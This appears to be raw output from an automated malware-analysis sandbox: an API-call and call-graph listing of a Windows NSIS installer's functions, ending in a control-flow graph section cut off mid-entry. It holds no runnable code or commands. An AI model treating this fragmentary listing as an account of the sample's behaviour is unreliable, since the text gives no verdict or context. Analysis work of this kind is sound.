4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 